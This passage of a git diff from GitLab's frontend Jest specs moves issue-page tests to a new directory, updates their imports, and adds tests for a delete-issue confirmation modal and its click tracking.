findModal().vm.$emit('primary'); + }); + + it('"delete" event is emitted by DeleteIssueModal', () => { + expect(wrapper.emitted('delete')).toEqual([[]]); + }); + + it('submits the form', () => { + expect(formSubmitSpy).toHaveBeenCalled(); + }); + }); + }); + + describe('form', () => { + beforeEach(() => { + wrapper = mountComponent(); + }); + + it('renders with action and method', () => { + expect(findForm().attributes()).toEqual({ + action: defaultProps.issuePath, + method: 'post', + 
}); + }); + + it('contains form data', () => { + const formData = wrapper.findAll('input').wrappers.reduce( + (acc, input) => ({ + ...acc, + [input.element.name]: input.element.value, + }), + {}, + ); + + expect(formData).toEqual({ + _method: 'delete', + authenticity_token: 'mock-csrf-token', + destroy_confirm: 'true', + }); + }); + }); + + describe('body text', () => { + describe('when issue type is not epic', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(findForm().text()).toBe('Issue will be removed! Are you sure?'); + }); + }); + + describe('when issue type is epic', () => { + it('renders', () => { + wrapper = mountComponent({ issueType: 'epic' }); + + expect(findForm().text()).toBe('Delete this epic and all descendants?'); + }); + }); + }); +}); diff --git a/spec/frontend/issue_show/components/description_spec.js b/spec/frontend/issues/show/components/description_spec.js index bdcc82cab81..d39e00b9c9e 100644 --- a/spec/frontend/issue_show/components/description_spec.js +++ b/spec/frontend/issues/show/components/description_spec.js @@ -3,7 +3,7 @@ import Vue from 'vue'; import '~/behaviors/markdown/render_gfm'; import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; -import Description from '~/issue_show/components/description.vue'; +import Description from '~/issues/show/components/description.vue'; import TaskList from '~/task_list'; import { descriptionProps as props } from '../mock_data/mock_data'; diff --git a/spec/frontend/issue_show/components/edit_actions_spec.js b/spec/frontend/issues/show/components/edit_actions_spec.js index 50c27cb5bda..79368023d76 100644 --- a/spec/frontend/issue_show/components/edit_actions_spec.js +++ b/spec/frontend/issues/show/components/edit_actions_spec.js @@ -1,25 +1,25 @@ -import { GlButton, GlModal } from '@gitlab/ui'; -import { createLocalVue } from '@vue/test-utils'; +import { GlButton } from '@gitlab/ui'; +import Vue from 'vue'; 
import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import IssuableEditActions from '~/issue_show/components/edit_actions.vue'; -import eventHub from '~/issue_show/event_hub'; - +import IssuableEditActions from '~/issues/show/components/edit_actions.vue'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; +import eventHub from '~/issues/show/event_hub'; import { getIssueStateQueryResponse, updateIssueStateQueryResponse, } from '../mock_data/apollo_mock'; -const localVue = createLocalVue(); -localVue.use(VueApollo); - describe('Edit Actions component', () => { let wrapper; let fakeApollo; let mockIssueStateData; + Vue.use(VueApollo); + const mockResolvers = { Query: { issueState() { @@ -43,6 +43,7 @@ describe('Edit Actions component', () => { title: 'GitLab Issue', }, canDestroy: true, + endpoint: 'gitlab-org/gitlab-test/-/issues/1', issuableType: 'issue', ...props, }, @@ -56,11 +57,7 @@ describe('Edit Actions component', () => { }); }; - async function deleteIssuable(localWrapper) { - localWrapper.findComponent(GlModal).vm.$emit('primary'); - } - - const findModal = () => wrapper.findComponent(GlModal); + const findModal = () => wrapper.findComponent(DeleteIssueModal); const findEditButtons = () => wrapper.findAllComponents(GlButton); const findDeleteButton = () => wrapper.findByTestId('issuable-delete-button'); const findSaveButton = () => wrapper.findByTestId('issuable-save-button'); @@ -123,9 +120,30 @@ describe('Edit Actions component', () => { }); }); - describe('renders create modal with the correct information', () => { - it('renders correct modal id', () => { - expect(findModal().attributes('modalid')).toBe(modalId); + describe('delete issue button', () => { + let trackingSpy; + + beforeEach(() => { + 
trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it('tracks clicking on button', () => { + findDeleteButton().vm.$emit('click'); + + expect(trackingSpy).toHaveBeenCalledWith(undefined, 'click_button', { + label: 'delete_issue', + }); + }); + }); + + describe('delete issue modal', () => { + it('renders', () => { + expect(findModal().props()).toEqual({ + issuePath: 'gitlab-org/gitlab-test/-/issues/1', + issueType: 'Issue', + modalId, + title: 'Delete issue', + }); }); }); @@ -141,8 +159,8 @@ describe('Edit Actions component', () => { it('sends the `delete.issuable` event when clicking the delete confirm button', async () => { expect(eventHub.$emit).toHaveBeenCalledTimes(0); - await deleteIssuable(wrapper); - expect(eventHub.$emit).toHaveBeenCalledWith('delete.issuable', { destroy_confirm: true }); + findModal().vm.$emit('delete'); + expect(eventHub.$emit).toHaveBeenCalledWith('delete.issuable'); expect(eventHub.$emit).toHaveBeenCalledTimes(1); }); }); diff --git a/spec/frontend/issue_show/components/edited_spec.js b/spec/frontend/issues/show/components/edited_spec.js index a1683f060c0..8a8fe23230a 100644 --- a/spec/frontend/issue_show/components/edited_spec.js +++ b/spec/frontend/issues/show/components/edited_spec.js @@ -1,5 +1,5 @@ import Vue from 'vue'; -import edited from '~/issue_show/components/edited.vue'; +import edited from '~/issues/show/components/edited.vue'; function formatText(text) { return text.trim().replace(/\s\s+/g, ' '); diff --git a/spec/frontend/issue_show/components/fields/description_spec.js b/spec/frontend/issues/show/components/fields/description_spec.js index a50be30cf4c..3043c4c3673 100644 --- a/spec/frontend/issue_show/components/fields/description_spec.js +++ b/spec/frontend/issues/show/components/fields/description_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import DescriptionField from '~/issue_show/components/fields/description.vue'; -import eventHub from 
'~/issue_show/event_hub'; +import DescriptionField from '~/issues/show/components/fields/description.vue'; +import eventHub from '~/issues/show/event_hub'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; describe('Description field component', () => { diff --git a/spec/frontend/issue_show/components/fields/description_template_spec.js b/spec/frontend/issues/show/components/fields/description_template_spec.js index dc126c53f5e..abe2805e5b2 100644 --- a/spec/frontend/issue_show/components/fields/description_template_spec.js +++ b/spec/frontend/issues/show/components/fields/description_template_spec.js @@ -1,5 +1,5 @@ import Vue from 'vue'; -import descriptionTemplate from '~/issue_show/components/fields/description_template.vue'; +import descriptionTemplate from '~/issues/show/components/fields/description_template.vue'; describe('Issue description template component with templates as hash', () => { let vm; diff --git a/spec/frontend/issue_show/components/fields/title_spec.js b/spec/frontend/issues/show/components/fields/title_spec.js index 783ce9eb76c..efd0b6fbd30 100644 --- a/spec/frontend/issue_show/components/fields/title_spec.js +++ b/spec/frontend/issues/show/components/fields/title_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import TitleField from '~/issue_show/components/fields/title.vue'; -import eventHub from '~/issue_show/event_hub'; +import TitleField from '~/issues/show/components/fields/title.vue'; +import eventHub from '~/issues/show/event_hub'; describe('Title field component', () => { let wrapper; diff --git a/spec/frontend/issue_show/components/fields/type_spec.js b/spec/frontend/issues/show/components/fields/type_spec.js index 95ae6f37877..3ece10e70db 100644 --- a/spec/frontend/issue_show/components/fields/type_spec.js +++ b/spec/frontend/issues/show/components/fields/type_spec.js @@ -3,8 +3,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; 
import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import IssueTypeField, { i18n } from '~/issue_show/components/fields/type.vue'; -import { IssuableTypes } from '~/issue_show/constants'; +import IssueTypeField, { i18n } from '~/issues/show/components/fields/type.vue'; +import { IssuableTypes } from '~/issues/show/constants'; import { getIssueStateQueryResponse, updateIssueStateQueryResponse, diff --git a/spec/frontend/issue_show/components/form_spec.js b/spec/frontend/issues/show/components/form_spec.js index 28498cb90ec..db49d2635ba 100644 --- a/spec/frontend/issue_show/components/form_spec.js +++ b/spec/frontend/issues/show/components/form_spec.js @@ -1,11 +1,11 @@ import { GlAlert } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Autosave from '~/autosave'; -import DescriptionTemplate from '~/issue_show/components/fields/description_template.vue'; -import IssueTypeField from '~/issue_show/components/fields/type.vue'; -import formComponent from '~/issue_show/components/form.vue'; -import LockedWarning from '~/issue_show/components/locked_warning.vue'; -import eventHub from '~/issue_show/event_hub'; +import DescriptionTemplate from '~/issues/show/components/fields/description_template.vue'; +import IssueTypeField from '~/issues/show/components/fields/type.vue'; +import formComponent from '~/issues/show/components/form.vue'; +import LockedWarning from '~/issues/show/components/locked_warning.vue'; +import eventHub from '~/issues/show/event_hub'; jest.mock('~/autosave'); @@ -13,6 +13,7 @@ describe('Inline edit form component', () => { let wrapper; const defaultProps = { canDestroy: true, + endpoint: 'gitlab-org/gitlab-test/-/issues/1', formState: { title: 'b', description: 'a', diff --git a/spec/frontend/issue_show/components/header_actions_spec.js b/spec/frontend/issues/show/components/header_actions_spec.js index 4df62ec8717..2a16c699c4d 100644 --- 
a/spec/frontend/issue_show/components/header_actions_spec.js +++ b/spec/frontend/issues/show/components/header_actions_spec.js @@ -1,11 +1,15 @@ import { GlButton, GlDropdown, GlDropdownItem, GlLink, GlModal } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import { shallowMount } from '@vue/test-utils'; import Vuex from 'vuex'; +import { mockTracking } from 'helpers/tracking_helper'; import createFlash, { FLASH_TYPES } from '~/flash'; -import { IssuableType } from '~/issuable_show/constants'; -import HeaderActions from '~/issue_show/components/header_actions.vue'; -import { IssuableStatus, IssueStateEvent } from '~/issue_show/constants'; -import promoteToEpicMutation from '~/issue_show/queries/promote_to_epic.mutation.graphql'; +import { IssuableType } from '~/vue_shared/issuable/show/constants'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; +import HeaderActions from '~/issues/show/components/header_actions.vue'; +import { IssuableStatus } from '~/issues/constants'; +import { IssueStateEvent } from '~/issues/show/constants'; +import promoteToEpicMutation from '~/issues/show/queries/promote_to_epic.mutation.graphql'; import * as urlUtility from '~/lib/utils/url_utility'; import eventHub from '~/notes/event_hub'; import createStore from '~/notes/stores'; @@ -18,18 +22,20 @@ describe('HeaderActions component', () => { let wrapper; let visitUrlSpy; - const localVue = createLocalVue(); - localVue.use(Vuex); + Vue.use(Vuex); + const store = createStore(); const defaultProps = { canCreateIssue: true, + canDestroyIssue: true, canPromoteToEpic: true, canReopenIssue: true, canReportSpam: true, canUpdateIssue: true, iid: '32', isIssueAuthor: true, + issuePath: 'gitlab-org/gitlab-test/-/issues/1', issueType: IssuableType.Issue, newIssuePath: 'gitlab-org/gitlab-test/-/issues/new', projectPath: 'gitlab-org/gitlab-test', @@ -60,17 +66,12 @@ describe('HeaderActions component', () => { 
}, }; - const findToggleIssueStateButton = () => wrapper.find(GlButton); - - const findDropdownAt = (index) => wrapper.findAll(GlDropdown).at(index); - - const findMobileDropdownItems = () => findDropdownAt(0).findAll(GlDropdownItem); - - const findDesktopDropdownItems = () => findDropdownAt(1).findAll(GlDropdownItem); - - const findModal = () => wrapper.find(GlModal); - - const findModalLinkAt = (index) => findModal().findAll(GlLink).at(index); + const findToggleIssueStateButton = () => wrapper.findComponent(GlButton); + const findDropdownAt = (index) => wrapper.findAllComponents(GlDropdown).at(index); + const findMobileDropdownItems = () => findDropdownAt(0).findAllComponents(GlDropdownItem); + const findDesktopDropdownItems = () => findDropdownAt(1).findAllComponents(GlDropdownItem); + const findModal = () => wrapper.findComponent(GlModal); + const findModalLinkAt = (index) => findModal().findAllComponents(GlLink).at(index); const mountComponent = ({ props = {}, @@ -86,7 +87,6 @@ describe('HeaderActions component', () => { }); return shallowMount(HeaderActions, { - localVue, store, provide: { ...defaultProps, @@ -167,17 +167,19 @@ describe('HeaderActions component', () => { ${'desktop dropdown'} | ${false} | ${findDesktopDropdownItems} `('$description', ({ isCloseIssueItemVisible, findDropdownItems }) => { describe.each` - description | itemText | isItemVisible | canUpdateIssue | canCreateIssue | isIssueAuthor | canReportSpam | canPromoteToEpic - ${`when user can update ${issueType}`} | ${`Close ${issueType}`} | ${isCloseIssueItemVisible} | ${true} | ${true} | ${true} | ${true} | ${true} - ${`when user cannot update ${issueType}`} | ${`Close ${issueType}`} | ${false} | ${false} | ${true} | ${true} | ${true} | ${true} - ${`when user can create ${issueType}`} | ${`New ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${`when user cannot create ${issueType}`} | ${`New ${issueType}`} | ${false} | ${true} | ${false} | ${true} | ${true} | 
${true} - ${'when user can promote to epic'} | ${'Promote to epic'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user cannot promote to epic'} | ${'Promote to epic'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${false} - ${'when user can report abuse'} | ${'Report abuse'} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} - ${'when user cannot report abuse'} | ${'Report abuse'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user can submit as spam'} | ${'Submit as spam'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} - ${'when user cannot submit as spam'} | ${'Submit as spam'} | ${false} | ${true} | ${true} | ${true} | ${false} | ${true} + description | itemText | isItemVisible | canUpdateIssue | canCreateIssue | isIssueAuthor | canReportSpam | canPromoteToEpic | canDestroyIssue + ${`when user can update ${issueType}`} | ${`Close ${issueType}`} | ${isCloseIssueItemVisible} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot update ${issueType}`} | ${`Close ${issueType}`} | ${false} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user can create ${issueType}`} | ${`New ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot create ${issueType}`} | ${`New ${issueType}`} | ${false} | ${true} | ${false} | ${true} | ${true} | ${true} | ${true} + ${'when user can promote to epic'} | ${'Promote to epic'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user cannot promote to epic'} | ${'Promote to epic'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${false} | ${true} + ${'when user can report abuse'} | ${'Report abuse'} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} | ${true} + ${'when user cannot report abuse'} | ${'Report abuse'} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user can submit as spam'} | 
${'Submit as spam'} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${'when user cannot submit as spam'} | ${'Submit as spam'} | ${false} | ${true} | ${true} | ${true} | ${false} | ${true} | ${true} + ${`when user can delete ${issueType}`} | ${`Delete ${issueType}`} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} | ${true} + ${`when user cannot delete ${issueType}`} | ${`Delete ${issueType}`} | ${false} | ${true} | ${true} | ${true} | ${true} | ${true} | ${false} `( '$description', ({ @@ -188,6 +190,7 @@ describe('HeaderActions component', () => { isIssueAuthor, canReportSpam, canPromoteToEpic, + canDestroyIssue, }) => { beforeEach(() => { wrapper = mountComponent({ @@ -198,6 +201,7 @@ describe('HeaderActions component', () => { issueType, canReportSpam, canPromoteToEpic, + canDestroyIssue, }, }); }); @@ -214,6 +218,23 @@ describe('HeaderActions component', () => { }); }); + describe('delete issue button', () => { + let trackingSpy; + + beforeEach(() => { + wrapper = mountComponent(); + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it('tracks clicking on button', () => { + findDesktopDropdownItems().at(3).vm.$emit('click'); + + expect(trackingSpy).toHaveBeenCalledWith(undefined, 'click_dropdown', { + label: 'delete_issue', + }); + }); + }); + describe('when "Promote to epic" button is clicked', () => { describe('when response is successful', () => { beforeEach(() => { @@ -267,7 +288,7 @@ describe('HeaderActions component', () => { it('shows an error message', () => { expect(createFlash).toHaveBeenCalledWith({ - message: promoteToEpicMutationErrorResponse.data.promoteToEpic.errors.join('; '), + message: HeaderActions.i18n.promoteErrorMessage, }); }); }); @@ -293,7 +314,7 @@ describe('HeaderActions component', () => { }); }); - describe('modal', () => { + describe('blocked by issues modal', () => { const blockedByIssues = [ { iid: 13, web_url: 'gitlab-org/gitlab-test/-/issues/13' }, { iid: 79, 
web_url: 'gitlab-org/gitlab-test/-/issues/79' }, @@ -345,4 +366,17 @@ describe('HeaderActions component', () => { }); }); }); + + describe('delete issue modal', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(wrapper.findComponent(DeleteIssueModal).props()).toEqual({ + issuePath: defaultProps.issuePath, + issueType: defaultProps.issueType, + modalId: HeaderActions.deleteModalId, + title: 'Delete issue', + }); + }); + }); }); diff --git a/spec/frontend/issue_show/components/incidents/highlight_bar_spec.js b/spec/frontend/issues/show/components/incidents/highlight_bar_spec.js index 6758e6192b8..a4910d63bb5 100644 --- a/spec/frontend/issue_show/components/incidents/highlight_bar_spec.js +++ b/spec/frontend/issues/show/components/incidents/highlight_bar_spec.js @@ -1,7 +1,7 @@ import { GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import merge from 'lodash/merge'; -import HighlightBar from '~/issue_show/components/incidents/highlight_bar.vue'; +import HighlightBar from '~/issues/show/components/incidents/highlight_bar.vue'; import { formatDate } from '~/lib/utils/datetime_utility'; jest.mock('~/lib/utils/datetime_utility'); diff --git a/spec/frontend/issue_show/components/incidents/incident_tabs_spec.js b/spec/frontend/issues/show/components/incidents/incident_tabs_spec.js index 6b9f5b17e99..9bf0e106194 100644 --- a/spec/frontend/issue_show/components/incidents/incident_tabs_spec.js +++ b/spec/frontend/issues/show/components/incidents/incident_tabs_spec.js @@ -3,9 +3,9 @@ import { shallowMount } from '@vue/test-utils'; import merge from 'lodash/merge'; import waitForPromises from 'helpers/wait_for_promises'; import { trackIncidentDetailsViewsOptions } from '~/incidents/constants'; -import DescriptionComponent from '~/issue_show/components/description.vue'; -import HighlightBar from '~/issue_show/components/incidents/highlight_bar.vue'; -import IncidentTabs from '~/issue_show/components/incidents/incident_tabs.vue'; 
+import DescriptionComponent from '~/issues/show/components/description.vue'; +import HighlightBar from '~/issues/show/components/incidents/highlight_bar.vue'; +import IncidentTabs from '~/issues/show/components/incidents/incident_tabs.vue'; import INVALID_URL from '~/lib/utils/invalid_url'; import Tracking from '~/tracking'; import AlertDetailsTable from '~/vue_shared/components/alert_details_table.vue'; diff --git a/spec/frontend/issue_show/components/pinned_links_spec.js b/spec/frontend/issues/show/components/pinned_links_spec.js index 3fe1f9fd6d9..aac720df6e9 100644 --- a/spec/frontend/issue_show/components/pinned_links_spec.js +++ b/spec/frontend/issues/show/components/pinned_links_spec.js @@ -1,7 +1,7 @@ import { GlButton } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import PinnedLinks from '~/issue_show/components/pinned_links.vue'; -import { STATUS_PAGE_PUBLISHED, JOIN_ZOOM_MEETING } from '~/issue_show/constants'; +import PinnedLinks from '~/issues/show/components/pinned_links.vue'; +import { STATUS_PAGE_PUBLISHED, JOIN_ZOOM_MEETING } from '~/issues/show/constants'; const plainZoomUrl = 'https://zoom.us/j/123456789'; const plainStatusUrl = 'https://status.com'; diff --git a/spec/frontend/issue_show/components/title_spec.js b/spec/frontend/issues/show/components/title_spec.js index 78880a7f540..f9026557be2 100644 --- a/spec/frontend/issue_show/components/title_spec.js +++ b/spec/frontend/issues/show/components/title_spec.js @@ -1,7 +1,7 @@ import Vue from 'vue'; -import titleComponent from '~/issue_show/components/title.vue'; -import eventHub from '~/issue_show/event_hub'; -import Store from '~/issue_show/stores'; +import titleComponent from '~/issues/show/components/title.vue'; +import eventHub from '~/issues/show/event_hub'; +import Store from '~/issues/show/stores'; describe('Title component', () => { let vm; diff --git a/spec/frontend/issue_show/issue_spec.js b/spec/frontend/issues/show/issue_spec.js index 76989413edb..6d7a31a6c8c 
100644 --- a/spec/frontend/issue_show/issue_spec.js +++ b/spec/frontend/issues/show/issue_spec.js @@ -1,7 +1,7 @@ import MockAdapter from 'axios-mock-adapter'; import waitForPromises from 'helpers/wait_for_promises'; -import { initIssuableApp } from '~/issue_show/issue'; -import * as parseData from '~/issue_show/utils/parse_data'; +import { initIssuableApp } from '~/issues/show/issue'; +import * as parseData from '~/issues/show/utils/parse_data'; import axios from '~/lib/utils/axios_utils'; import createStore from '~/notes/stores'; import { appProps } from './mock_data/mock_data'; @@ -17,7 +17,7 @@ const setupHTML = (initialData) => { }; describe('Issue show index', () => { - describe('initIssueableApp', () => { + describe('initIssuableApp', () => { it('should initialize app with no potential XSS attack', async () => { const alertSpy = jest.spyOn(window, 'alert').mockImplementation(() => {}); const parseDataSpy = jest.spyOn(parseData, 'parseIssuableData'); diff --git a/spec/frontend/issue_show/mock_data/apollo_mock.js b/spec/frontend/issues/show/mock_data/apollo_mock.js index bfd31e74393..bfd31e74393 100644 --- a/spec/frontend/issue_show/mock_data/apollo_mock.js +++ b/spec/frontend/issues/show/mock_data/apollo_mock.js diff --git a/spec/frontend/issue_show/mock_data/mock_data.js b/spec/frontend/issues/show/mock_data/mock_data.js index a73826954c3..a73826954c3 100644 --- a/spec/frontend/issue_show/mock_data/mock_data.js +++ b/spec/frontend/issues/show/mock_data/mock_data.js diff --git a/spec/frontend/issue_show/store_spec.js b/spec/frontend/issues/show/store_spec.js index b7fd70bf00e..20d3a6cdaae 100644 --- a/spec/frontend/issue_show/store_spec.js +++ b/spec/frontend/issues/show/store_spec.js @@ -1,7 +1,7 @@ -import Store from '~/issue_show/stores'; -import updateDescription from '~/issue_show/utils/update_description'; +import Store from '~/issues/show/stores'; +import updateDescription from '~/issues/show/utils/update_description'; 
-jest.mock('~/issue_show/utils/update_description'); +jest.mock('~/issues/show/utils/update_description'); describe('Store', () => { let store; diff --git a/spec/frontend/issue_show/utils/update_description_spec.js b/spec/frontend/issues/show/utils/update_description_spec.js index b2c6bd3c302..f4afef8af12 100644 --- a/spec/frontend/issue_show/utils/update_description_spec.js +++ b/spec/frontend/issues/show/utils/update_description_spec.js @@ -1,4 +1,4 @@ -import updateDescription from '~/issue_show/utils/update_description'; +import updateDescription from '~/issues/show/utils/update_description'; describe('updateDescription', () => { it('returns the correct value to be set as descriptionHtml', () => { diff --git a/spec/frontend/issues_list/components/issuable_spec.js b/spec/frontend/issues_list/components/issuable_spec.js index 97d841c861d..f3c2ae1f9dc 100644 --- a/spec/frontend/issues_list/components/issuable_spec.js +++ b/spec/frontend/issues_list/components/issuable_spec.js @@ -7,7 +7,7 @@ import { isScopedLabel } from '~/lib/utils/common_utils'; import { formatDate } from '~/lib/utils/datetime_utility'; import { mergeUrlParams } from '~/lib/utils/url_utility'; import initUserPopovers from '~/user_popovers'; -import IssueAssignees from '~/vue_shared/components/issue/issue_assignees.vue'; +import IssueAssignees from '~/issuable/components/issue_assignees.vue'; import { simpleIssue, testAssignees, testLabels } from '../issuable_list_test_data'; jest.mock('~/user_popovers'); diff --git a/spec/frontend/issues_list/components/issuables_list_app_spec.js b/spec/frontend/issues_list/components/issuables_list_app_spec.js index 5ef2a2e0525..11854db534e 100644 --- a/spec/frontend/issues_list/components/issuables_list_app_spec.js +++ b/spec/frontend/issues_list/components/issuables_list_app_spec.js @@ -13,7 +13,7 @@ import createFlash from '~/flash'; import Issuable from '~/issues_list/components/issuable.vue'; import IssuablesListApp from 
'~/issues_list/components/issuables_list_app.vue'; import { PAGE_SIZE, PAGE_SIZE_MANUAL, RELATIVE_POSITION } from '~/issues_list/constants'; -import issueablesEventBus from '~/issues_list/eventhub'; +import issuablesEventBus from '~/issues_list/eventhub'; import FilteredSearchBar from '~/vue_shared/components/filtered_search_bar/filtered_search_bar_root.vue'; jest.mock('~/flash'); @@ -185,8 +185,8 @@ describe('Issuables list component', () => { describe('with bulk editing enabled', () => { beforeEach(() => { - issueablesEventBus.$on.mockReset(); - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$on.mockReset(); + issuablesEventBus.$emit.mockReset(); setupApiMock(() => [200, MOCK_ISSUES.slice(0)]); factory({ canBulkEdit: true }); @@ -239,19 +239,19 @@ describe('Issuables list component', () => { }); it('broadcasts a message to the bulk edit sidebar when a value is added to selection', () => { - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$emit.mockReset(); const i1 = wrapper.vm.issuables[1]; wrapper.vm.onSelectIssuable({ issuable: i1, selected: true }); return wrapper.vm.$nextTick().then(() => { - expect(issueablesEventBus.$emit).toHaveBeenCalledTimes(1); - expect(issueablesEventBus.$emit).toHaveBeenCalledWith('issuables:updateBulkEdit'); + expect(issuablesEventBus.$emit).toHaveBeenCalledTimes(1); + expect(issuablesEventBus.$emit).toHaveBeenCalledWith('issuables:updateBulkEdit'); }); }); it('does not broadcast a message to the bulk edit sidebar when a value is not added to selection', () => { - issueablesEventBus.$emit.mockReset(); + issuablesEventBus.$emit.mockReset(); return wrapper.vm .$nextTick() @@ -263,19 +263,19 @@ describe('Issuables list component', () => { }) .then(wrapper.vm.$nextTick) .then(() => { - expect(issueablesEventBus.$emit).toHaveBeenCalledTimes(0); + expect(issuablesEventBus.$emit).toHaveBeenCalledTimes(0); }); }); it('listens to a message to toggle bulk editing', () => { expect(wrapper.vm.isBulkEditing).toBe(false); - 
expect(issueablesEventBus.$on.mock.calls[0][0]).toBe('issuables:toggleBulkEdit'); - issueablesEventBus.$on.mock.calls[0][1](true); // Call the message handler + expect(issuablesEventBus.$on.mock.calls[0][0]).toBe('issuables:toggleBulkEdit'); + issuablesEventBus.$on.mock.calls[0][1](true); // Call the message handler return waitForPromises() .then(() => { expect(wrapper.vm.isBulkEditing).toBe(true); - issueablesEventBus.$on.mock.calls[0][1](false); + issuablesEventBus.$on.mock.calls[0][1](false); }) .then(() => { expect(wrapper.vm.isBulkEditing).toBe(false); diff --git a/spec/frontend/issues_list/components/issue_card_time_info_spec.js b/spec/frontend/issues_list/components/issue_card_time_info_spec.js index d195c159cbb..7c5faeb8dc1 100644 --- a/spec/frontend/issues_list/components/issue_card_time_info_spec.js +++ b/spec/frontend/issues_list/components/issue_card_time_info_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 'helpers/fake_date'; import IssueCardTimeInfo from '~/issues_list/components/issue_card_time_info.vue'; -describe('IssuesListApp component', () => { +describe('CE IssueCardTimeInfo component', () => { useFakeDate(2020, 11, 11); let wrapper; diff --git a/spec/frontend/issues_list/components/issues_list_app_spec.js b/spec/frontend/issues_list/components/issues_list_app_spec.js index 3f52c7b4afe..f24c090fa92 100644 --- a/spec/frontend/issues_list/components/issues_list_app_spec.js +++ b/spec/frontend/issues_list/components/issues_list_app_spec.js @@ -1,8 +1,9 @@ import { GlButton, GlEmptyState, GlLink } from '@gitlab/ui'; -import { createLocalVue, mount, shallowMount } from '@vue/test-utils'; +import * as Sentry from '@sentry/browser'; +import { mount, shallowMount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; import { cloneDeep } from 'lodash'; -import { nextTick } from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import getIssuesQuery 
from 'ee_else_ce/issues_list/queries/get_issues.query.graphql'; import getIssuesCountsQuery from 'ee_else_ce/issues_list/queries/get_issues_counts.query.graphql'; @@ -17,29 +18,28 @@ import { locationSearch, urlParams, } from 'jest/issues_list/mock_data'; -import createFlash from '~/flash'; +import createFlash, { FLASH_TYPES } from '~/flash'; import { convertToGraphQLId, getIdFromGraphQLId } from '~/graphql_shared/utils'; import CsvImportExportButtons from '~/issuable/components/csv_import_export_buttons.vue'; import IssuableByEmail from '~/issuable/components/issuable_by_email.vue'; -import IssuableList from '~/issuable_list/components/issuable_list_root.vue'; -import { IssuableListTabs, IssuableStates } from '~/issuable_list/constants'; +import IssuableList from '~/vue_shared/issuable/list/components/issuable_list_root.vue'; +import { IssuableListTabs, IssuableStates } from '~/vue_shared/issuable/list/constants'; import IssuesListApp from '~/issues_list/components/issues_list_app.vue'; import NewIssueDropdown from '~/issues_list/components/new_issue_dropdown.vue'; import { CREATED_DESC, DUE_DATE_OVERDUE, PARAM_DUE_DATE, + RELATIVE_POSITION, + RELATIVE_POSITION_ASC, TOKEN_TYPE_ASSIGNEE, TOKEN_TYPE_AUTHOR, TOKEN_TYPE_CONFIDENTIAL, - TOKEN_TYPE_EPIC, - TOKEN_TYPE_ITERATION, TOKEN_TYPE_LABEL, TOKEN_TYPE_MILESTONE, TOKEN_TYPE_MY_REACTION, TOKEN_TYPE_RELEASE, TOKEN_TYPE_TYPE, - TOKEN_TYPE_WEIGHT, urlSortParams, } from '~/issues_list/constants'; import eventHub from '~/issues_list/eventhub'; @@ -48,17 +48,17 @@ import axios from '~/lib/utils/axios_utils'; import { scrollUp } from '~/lib/utils/scroll_utils'; import { joinPaths } from '~/lib/utils/url_utility'; +jest.mock('@sentry/browser'); jest.mock('~/flash'); jest.mock('~/lib/utils/scroll_utils', () => ({ scrollUp: jest.fn().mockName('scrollUpMock'), })); -describe('IssuesListApp component', () => { +describe('CE IssuesListApp component', () => { let axiosMock; let wrapper; - const localVue = createLocalVue(); - 
